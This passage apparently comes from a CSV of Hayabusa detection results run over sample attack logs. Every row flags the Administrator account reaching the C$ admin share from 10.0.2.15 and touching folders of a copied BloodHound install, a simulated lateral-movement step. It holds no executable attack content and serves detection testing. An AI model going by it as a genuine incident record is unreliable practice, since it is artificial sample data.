0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5 | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share 
File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style 
| IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2 | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
